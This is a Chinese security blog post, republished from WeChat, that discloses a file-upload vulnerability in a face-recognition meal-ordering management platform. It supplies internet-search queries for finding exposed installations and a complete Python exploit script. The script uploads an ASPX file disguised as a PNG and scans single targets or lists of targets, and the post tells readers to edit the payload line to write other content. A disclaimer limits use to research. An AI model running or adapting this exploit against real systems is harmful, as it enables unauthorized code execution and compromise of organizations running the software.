优卡特脸爱云管理系统存在文件上传漏洞

admin
admin
admin
139164
文章
114
评论
2024年5月13日01:17:54评论22 views字数 1773阅读5分54秒阅读模式

0x01 工具介绍

脸爱云是一款智慧点餐管理平台,该平台 /UpLoadPic.ashx接口处存在文件上传漏洞。

0x02 安装与使用

一、资产测绘

FOFA:title=="欢迎使用脸爱云 一脸通智慧管理平台"Zoomeye:title:"欢迎使用脸爱云 一脸通智慧管理平台"

二、参数使用

python -u http://target_ip/Login.aspxpython -f file.txt

三、使用原理

对指定ip上传post报文构造aspx文件,并通过脚本内response.write写入数据,如若想写入其他数据,请自行修改该行。如果上传成功,则返回存在漏洞,请自行进行后续测试。

四、使用结果

1. 命令输入

优卡特脸爱云管理系统存在文件上传漏洞

2. 后续验证

文件上传测试如下:

优卡特脸爱云管理系统存在文件上传漏洞

文件访问存在:

优卡特脸爱云管理系统存在文件上传漏洞

0x03 PoC

import requests
import argparse

def send_request(url):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
        "Accept": "*/*",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13u",
        "X-Requested-With": "XMLHttpRequest"
    }

    data = """------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="action"

post
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="myPhoto"; filename="hard.aspx"
Content-Type: image/png

<% response.write("123") %>

------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="oldName"


------WebKitFormBoundarywt7cEu1eBdibB13u--"""

    response = requests.post(url, headers=headers, data=data)
    if response.status_code == 200:
        print(f"漏洞存在: {url},请进行后续测试")


def process_url(url):
    print(f"发送请求至 {url}")
    send_request(url)

def process_file(file_path):
    with open(file_path, "r") as file:
        for line in file:
            url = line.strip()
            if url:
                process_url(url)

def main():
    parser = argparse.ArgumentParser(description="发送报文到指定 IP 地址")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("-u", "--url", help="指定单个 URL 发送报文")
    group.add_argument("-f", "--file", help="指定包含 IP 地址的文本文件发送报文")
    args = parser.parse_args()

    if args.url:
        process_url(args.url)
    elif args.file:
        process_file(args.file)

if __name__ == "__main__":
    main()

 

优卡特脸爱云管理系统存在文件上传漏洞

原文始发于微信公众号(网络安全者):优卡特脸爱云管理系统存在文件上传漏洞(5月9日更新)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月13日01:17:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   优卡特脸爱云管理系统存在文件上传漏洞http://cn-sec.com/archives/2733810.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息